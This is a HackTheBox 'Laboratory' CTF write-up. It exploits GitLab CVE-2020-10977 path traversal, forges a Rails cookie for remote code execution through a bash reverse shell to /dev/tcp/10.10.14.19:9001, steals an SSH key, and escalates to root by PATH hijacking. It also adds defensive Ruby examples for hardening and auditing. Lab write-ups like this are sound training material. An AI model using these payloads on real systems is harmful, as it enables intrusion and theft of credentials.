# HackTheBox Laboratory
## 1. Info
* IP : 10.10.10.216
* OS : Linux
* Difficulty : Easy
## 2. Nmap
* Payload: `sudo nmap -sV 10.10.10.216 -oA nmap/10.10.10.216`
* Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
* Port 80: Apache httpd 2.4.41
* Port 443: Apache/2.4.41
* ssl-cert: Subject: commonName=laboratory.htb
* No CVE to use
## 3. Web Server
* View:

* Web Server redirect us to laboratory.htb
* Add laboratory.htb to /etc/hosts file

* View:

* Gobuster
* Payload: `gobuster dir -u "https://laboratory.htb/" -w ../../../文件/SecLists/Discovery/Web-Content/raft-small-words.txt -x html`
* Output: unable to connect to https://laboratory.htb/: invalid certificate: x509: certificate is valid for git.laboratory.htb, not laboratory.htb

* Re-run Gobuster with the `-k` (`--no-tls-validation`) option to skip the certificate check
* Add git.laboratory.htb to /etc/hosts
* Nothing interesting in the Gobuster output for laboratory.htb
## 4. Web Server(GitLab Server)
* View:

* Sign up
* Try to sign up with a normal email account

* Fail!
* Try to use **laboratory@htb** to sign up

* Success!
* Explore GitLab
* Project SecureWebsite
* Author:Dexter McPherson
* Internal Project

* There is no branch in this project
* The project's index.html looks the same as https://laboratory.htb/
* Issue:
* Created by Seven

* HTTP 418 is a **JOKE** nothing useful
* GitLab Server
* Version: GitLab Community Edition 12.8.1
* Google it!

* [CVE-2020-10977](https://nvd.nist.gov/vuln/detail/CVE-2020-10977)
## 5. Exploit GitLab Server(CVE-2020-10977)
* CVE Info:
* CVE Number: CVE-2020-10977
* Affected versions: GitLab below 12.9.0
* CVE Description: GitLab EE/CE 8.5 to 12.9 is vulnerable to a path traversal when moving an issue between projects. (From NVD)
* Vulnerable Code:

```ruby
# /opt/gitlab/embedded/service/gitlab-rails/lib/gitlab/gfm/uploads_rewriter.rb
@text.gsub(@pattern) do |markdown|
  file = find_file(@source_project, $~[:secret], $~[:file])
  break markdown unless file.try(:exists?)

  klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
  moved = klass.copy_to(file, target_parent)
  ...

# "file" comes straight from the markdown capture and is used without any check
def find_file(project, secret, file)
  uploader = FileUploader.new(project, secret: secret)
  uploader.retrieve_from_store!(file)
  uploader
end
..............
MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze
```
* Exploit LFI:
* **Needs a valid username and password**
* Exploit PoC: [cve-2020-10977.py](https://github.com/thewhiteh4t/cve-2020-10977/blob/main/cve_2020_10977.py)
* Payload: `python3 cve_2020_10977.py https://git.laboratory.htb user passwd`

* We can read a local file by entering its absolute path:

* PoC Analyze:
* Create 2 projects:

* Create Issue:

* Issue Data:

* Issue description:
* `'.format(filename)`
* Move Issue:
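The traversal comes from the `file` capture being joined under the upload directory without any check. The following is an added example (not GitLab's code and not the PoC): it reproduces the quoted `MARKDOWN_PATTERN`, shows the unchecked lookup beside a hardened one that rejects any path escaping the per-secret directory, and runs both over a constructed issue description. `UPLOAD_ROOT`, the secret and the description are assumptions.

```ruby
# Constructed example (not GitLab's code): the markdown pattern quoted above,
# which captures a 32-hex "secret" and a free-form "file" component.
MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze

UPLOAD_ROOT = "/var/opt/gitlab/uploads".freeze   # hypothetical upload root
SAMPLE_SECRET = ("a" * 32).freeze                # constructed secret
TRAVERSAL_FILE = (("../" * 9) + "etc/passwd").freeze # constructed traversal

# Vulnerable lookup: the "file" capture is joined under the upload directory
# with no validation, so a chain of "../" segments walks out of it.
def resolve_upload_vulnerable(secret, file)
  File.expand_path(File.join(UPLOAD_ROOT, secret, file))
end

# Hardened lookup: canonicalise the result and refuse anything that does not
# stay strictly below the per-secret directory (returns nil on traversal).
def resolve_upload_hardened(secret, file)
  base = File.expand_path(File.join(UPLOAD_ROOT, secret))
  candidate = File.expand_path(File.join(base, file))
  return nil unless candidate.start_with?(base + File::SEPARATOR)
  candidate
end

# Walk every upload reference in an issue description and classify it; this
# is the check a move-issue handler should apply before copying any file.
def audit_description(text)
  text.scan(MARKDOWN_PATTERN).map do |secret, file|
    [file, resolve_upload_hardened(secret, file) ? :allowed : :blocked]
  end
end

# Constructed issue description: one legitimate attachment and one link that
# tries to escape the uploads directory the way the PoC's description does.
SAMPLE_DESCRIPTION = <<~MD
  ![avatar](/uploads/#{SAMPLE_SECRET}/avatar.png)
  [leak](/uploads/#{SAMPLE_SECRET}/#{TRAVERSAL_FILE})
MD

puts audit_description(SAMPLE_DESCRIPTION).inspect if __FILE__ == $PROGRAM_NAME
```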

* Exploit RCE
* **Need to build same version of GitLab on attacker machine**
* Build GitLab with Docker:`sudo docker run gitlab/gitlab-ce:12.8.1-ce.0`
* Enter the Docker shell: `sudo docker exec -it <container_name> bash` (replace `<container_name>` with the running container's name)
* Get secret_key_base from the lab's GitLab:
* Absolute Path to File : `/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml`
* Change Docker's GitLab secret_key_base value to Lab's secret_key_base:
* Docker Shell:
* `cd /etc/gitlab`
* `vim gitlab.rb`
* Add gitlab_rails['secret_key_base']='Lab_secret_key_base_here'

* `gitlab-ctl reconfigure`
* Start the GitLab rails console in Docker: `gitlab-rails console`
* Enter the payload in the GitLab rails console:
```ruby
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.19/9001 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
```
* After running this in the console we get the signed cookie value that carries the RCE payload:

* Attacker machine
* Set up netcat: `nc -lvnp 9001`
* Payload: `curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=enter_rce_payload_here" -k`

* Get shell (user: git)

## 6. Privilege Escalation To User Dexter
* Current Info:
* Username: git
* IP address: 172.17.0.2
* Container: Yes(Docker)
* Gitlab-rails
* GitLab is a web application built using the Ruby on Rails framework
* The GitLab Rails console is for system administrators who are troubleshooting a problem or need to retrieve data that can only be reached through direct access to the GitLab application
* We can modify user data through the GitLab Rails console
* Get gitlab admin
* Get in GitLab Rails Console
* `gitlab-rails console`

* We can use `User.find_by(username: "your_username")`

* Set user role to admin
```ruby
user = User.find_by(username: "jerry")
user.admin=true
user.save
```
* We get admin access to GitLab

* Explore GitLab
* On the projects page we see another project created by @dexter

* Exploring the project we find a .ssh directory

* Log in as Dexter over SSH
* Copy the id_rsa file to the attacker machine
* Log in as dexter using the id_rsa file

## 7. Privilege Escalation To Root
* Enum
* Run Linpeas.sh

* There is an unusual port open (60080)
* Use `curl 127.0.0.1:60080 -L`

* Looks like GitLab Server
* Nothing to do here

* Interesting path

* Found an unknown SUID binary
* Privilege Escalation To Root
* Analyze docker-security
* `ltrace docker-security`

* docker-security sets uid and gid to 0 (root), then executes the `chmod` command
* Because `chmod` is invoked by bare name, it is resolved through \$PATH, so we can exploit it by putting a fake `chmod` in a directory that appears earlier in \$PATH
* Exploit
* Go to any directory we can write to (/tmp/bin)
* Create a shell script named `chmod` (make it executable with `chmod +x`)

* Add /tmp/bin to \$PATH: `export PATH=/tmp/bin:$PATH`
* Run docker-security

* Get root!
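The root cause is a privileged program that inherits the caller's `$PATH` and runs `chmod` by bare name. The following is an added example (not the box's binary and not code from the writeup): it models the left-to-right lookup that makes the fake `chmod` win, shows the mitigation of resolving only against a fixed trusted directory, and includes the audit a defender would run for world-writable `$PATH` entries. The directory layout is constructed inside a temp dir; `resolve_command`, `risky_path_dirs` and `demo` are names chosen here.

```ruby
require "tmpdir"
require "fileutils"

# Walk PATH left to right and return the first executable file named cmd,
# which is what happens when a SUID helper runs "chmod" without a full path.
# Executability is judged from the mode bits so the model also works on a
# noexec temp filesystem.
def resolve_command(cmd, path_env)
  path_env.split(File::PATH_SEPARATOR).each do |dir|
    candidate = File.join(dir, cmd)
    return candidate if File.file?(candidate) && (File.stat(candidate).mode & 0o111) != 0
  end
  nil
end

# Audit: PATH entries that are world-writable let any local user shadow a
# system command for a program that inherits this PATH.
def risky_path_dirs(path_env)
  path_env.split(File::PATH_SEPARATOR).select do |dir|
    File.directory?(dir) && (File.stat(dir).mode & 0o002) != 0
  end
end

# Constructed layout inside a temp dir: "bin" stands in for the system bin
# holding the real chmod, "tmp/bin" is a world-writable dir holding a fake one.
def demo
  Dir.mktmpdir do |root|
    sys_bin = File.join(root, "bin")
    tmp_bin = File.join(root, "tmp", "bin")
    FileUtils.mkdir_p([sys_bin, tmp_bin])
    [sys_bin, tmp_bin].each do |dir|
      File.write(File.join(dir, "chmod"), "#!/bin/sh\n")
      File.chmod(0o755, File.join(dir, "chmod"))
    end
    File.chmod(0o755, sys_bin)   # system bin: root-owned, not world-writable
    File.chmod(0o777, tmp_bin)   # user-controlled dir, like /tmp/bin on the box
    inherited = [tmp_bin, sys_bin].join(File::PATH_SEPARATOR)
    {
      inherited: resolve_command("chmod", inherited), # fake copy is found first
      hardened: resolve_command("chmod", sys_bin),    # fixed trusted PATH only
      risky: risky_path_dirs(inherited),              # what an audit would flag
      sys_bin: sys_bin,
      tmp_bin: tmp_bin
    }
  end
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

The equivalent fix in the binary itself is to call `chmod` by absolute path (or reset `PATH` to a fixed system value) before exec.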